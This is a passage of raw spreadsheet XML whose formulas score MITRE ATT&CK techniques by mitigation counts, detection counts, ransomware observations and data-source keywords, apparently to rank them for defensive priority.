      </c>
      <c r="AK477" s="25">
        <f>IF(AJ477="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL477" s="25" t="str" cm="1">
        <f t="array" ref="AL477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC477)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM477" s="25">
        <f>IF(AL477="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN477" s="60">
        <v>1</v>
      </c>
      <c r="AO477" s="51">
        <v>1</v>
      </c>
      <c r="AP477" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6633333333333332E-2</v>
      </c>
      <c r="AQ477" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR477" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS477" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT477" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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78" spans="1:47">
      <c r="A478" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6633333333333332E-2</v>
      </c>
      <c r="B478" s="25">
        <f>SUM(H478,M478,V478)*(1+SUM(AE478,AG478,AI478,AK478,AM478))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C478" s="25" t="s">
        <v>1733</v>
      </c>
      <c r="D478" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E478" s="25" t="s">
        <v>1734</v>
      </c>
      <c r="F478" s="51">
        <v>1</v>
      </c>
      <c r="G478" s="51">
        <v>1</v>
      </c>
      <c r="H478" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I478">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J478">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K478">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L478">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M478" s="25">
        <v>0</v>
      </c>
      <c r="N478" s="51">
        <v>0</v>
      </c>
      <c r="O478" s="51">
        <v>0</v>
      </c>
      <c r="P478" s="51">
        <v>0</v>
      </c>
      <c r="Q478" s="51">
        <v>0</v>
      </c>
      <c r="R478" s="51"/>
      <c r="S478" s="51">
        <v>0</v>
      </c>
      <c r="T478" s="52" t="s">
        <v>1735</v>
      </c>
      <c r="U478" s="51">
        <v>0</v>
      </c>
      <c r="V478" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W478">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X478">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y478">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z478">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA478">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB478">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC478" s="29" t="s">
        <v>1736</v>
      </c>
      <c r="AD478" s="25" t="str" cm="1">
        <f t="array" ref="AD478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC478)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE478" s="25">
        <f>IF(AD478="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF478" s="25" t="str" cm="1">
        <f t="array" ref="AF478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC478)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG478" s="25">
        <f>IF(AF478="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH478" s="25" t="str" cm="1">
        <f t="array" ref="AH478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC478)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI478" s="25">
        <f>IF(AH478="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ478" s="25" t="str" cm="1">
        <f t="array" ref="AJ478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC478)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK478" s="25">
        <f>IF(AJ478="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL478" s="25" t="str" cm="1">
        <f t="array" ref="AL478">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC478)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM478" s="25">
        <f>IF(AL478="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN478" s="60">
        <v>1</v>
      </c>
      <c r="AO478" s="51">
        <v>1</v>
      </c>
      <c r="AP478" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6633333333333332E-2</v>
      </c>
      <c r="AQ478" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR478" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS478" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT478" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU47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79" spans="1:47" ht="63.95">
      <c r="A479" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B479" s="25">
        <f>SUM(H479,M479,V479)*(1+SUM(AE479,AG479,AI479,AK479,AM479))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C479" s="25" t="s">
        <v>1737</v>
      </c>
      <c r="D479" s="25" t="s">
        <v>1738</v>
      </c>
      <c r="E479" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F479" s="51">
        <v>1</v>
      </c>
      <c r="G479" s="51">
        <v>1</v>
      </c>
      <c r="H479" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I479">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J479">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K479">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L479">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M479" s="25">
        <v>0</v>
      </c>
      <c r="N479" s="51">
        <v>0</v>
      </c>
      <c r="O479" s="51">
        <v>0</v>
      </c>
      <c r="P479" s="51">
        <v>0</v>
      </c>
      <c r="Q479" s="51">
        <v>0</v>
      </c>
      <c r="R479" s="51"/>
      <c r="S479" s="51">
        <v>0</v>
      </c>
      <c r="T479" s="51"/>
      <c r="U479" s="51">
        <v>0</v>
      </c>
      <c r="V479" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W479">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X479">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y479">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z479">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA479">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB479">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC479" s="29" t="s">
        <v>1739</v>
      </c>
      <c r="AD479" s="25" t="str" cm="1">
        <f t="array" ref="AD479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC479)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE479" s="25">
        <f>IF(AD479="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF479" s="25" t="str" cm="1">
        <f t="array" ref="AF479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC479)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG479" s="25">
        <f>IF(AF479="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH479" s="25" t="str" cm="1">
        <f t="array" ref="AH479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC479)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI479" s="25">
        <f>IF(AH479="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ479" s="25" t="str" cm="1">
        <f t="array" ref="AJ479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC479)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK479" s="25">
        <f>IF(AJ479="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL479" s="25" t="str" cm="1">
        <f t="array" ref="AL479">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC479)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM479" s="25">
        <f>IF(AL479="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN479" s="51"/>
      <c r="AO479" s="51">
        <v>1</v>
      </c>
      <c r="AP479" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ479" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR479" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS479" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT479" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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80" spans="1:47" ht="96">
      <c r="A480" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B480" s="25">
        <f>SUM(H480,M480,V480)*(1+SUM(AE480,AG480,AI480,AK480,AM480))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C480" s="25" t="s">
        <v>1740</v>
      </c>
      <c r="D480" s="25" t="s">
        <v>1741</v>
      </c>
      <c r="E480" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F480" s="51">
        <v>1</v>
      </c>
      <c r="G480" s="51">
        <v>1</v>
      </c>
      <c r="H480" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I480">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J480">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K480">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L480">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M480" s="25">
        <v>0</v>
      </c>
      <c r="N480" s="51">
        <v>0</v>
      </c>
      <c r="O480" s="51">
        <v>0</v>
      </c>
      <c r="P480" s="51">
        <v>0</v>
      </c>
      <c r="Q480" s="51">
        <v>0</v>
      </c>
      <c r="R480" s="51"/>
      <c r="S480" s="51">
        <v>0</v>
      </c>
      <c r="T480" s="51"/>
      <c r="U480" s="51">
        <v>0</v>
      </c>
      <c r="V480" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W480">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X480">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y480">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z480">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA480">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB480">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC480" s="29" t="s">
        <v>1742</v>
      </c>
      <c r="AD480" s="25" t="str" cm="1">
        <f t="array" ref="AD480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC480)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE480" s="25">
        <f>IF(AD480="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF480" s="25" t="str" cm="1">
        <f t="array" ref="AF480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC480)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG480" s="25">
        <f>IF(AF480="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH480" s="25" t="str" cm="1">
        <f t="array" ref="AH480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC480)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI480" s="25">
        <f>IF(AH480="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ480" s="25" t="str" cm="1">
        <f t="array" ref="AJ480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC480)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK480" s="25">
        <f>IF(AJ480="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL480" s="25" t="str" cm="1">
        <f t="array" ref="AL480">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC480)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM480" s="25">
        <f>IF(AL480="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN480" s="51"/>
      <c r="AO480" s="51"/>
      <c r="AP480" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ480" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR480" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS480" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT480" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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81" spans="1:47" ht="48">
      <c r="A481" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B481" s="25">
        <f>SUM(H481,M481,V481)*(1+SUM(AE481,AG481,AI481,AK481,AM481))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C481" s="25" t="s">
        <v>1743</v>
      </c>
      <c r="D481" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E481" s="25" t="s">
        <v>1744</v>
      </c>
      <c r="F481" s="51">
        <v>1</v>
      </c>
      <c r="G481" s="51">
        <v>1</v>
      </c>
      <c r="H481" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I481">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J481">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K481">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L481">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M481" s="25">
        <v>0</v>
      </c>
      <c r="N481" s="51">
        <v>0</v>
      </c>
      <c r="O481" s="51">
        <v>0</v>
      </c>
      <c r="P481" s="51">
        <v>0</v>
      </c>
      <c r="Q481" s="51">
        <v>0</v>
      </c>
      <c r="R481" s="51"/>
      <c r="S481" s="51">
        <v>0</v>
      </c>
      <c r="T481" s="51"/>
      <c r="U481" s="51">
        <v>0</v>
      </c>
      <c r="V481" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W481">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X481">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y481">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z481">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA481">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB481">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC481" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD481" s="25" t="str" cm="1">
        <f t="array" ref="AD481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE481" s="25">
        <f>IF(AD481="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF481" s="25" t="str" cm="1">
        <f t="array" ref="AF481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC481)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG481" s="25">
        <f>IF(AF481="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH481" s="25" t="str" cm="1">
        <f t="array" ref="AH481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC481)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI481" s="25">
        <f>IF(AH481="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ481" s="25" t="str" cm="1">
        <f t="array" ref="AJ481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK481" s="25">
        <f>IF(AJ481="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL481" s="25" t="str" cm="1">
        <f t="array" ref="AL481">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC481)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM481" s="25">
        <f>IF(AL481="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN481" s="60">
        <v>0</v>
      </c>
      <c r="AO481" s="51">
        <v>0</v>
      </c>
      <c r="AP481" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ481" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR481" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS481" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT481" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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82" spans="1:47" ht="48">
      <c r="A482" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B482" s="25">
        <f>SUM(H482,M482,V482)*(1+SUM(AE482,AG482,AI482,AK482,AM482))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C482" s="25" t="s">
        <v>1745</v>
      </c>
      <c r="D482" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E482" s="25" t="s">
        <v>1746</v>
      </c>
      <c r="F482" s="51">
        <v>1</v>
      </c>
      <c r="G482" s="51">
        <v>1</v>
      </c>
      <c r="H482" s="25">
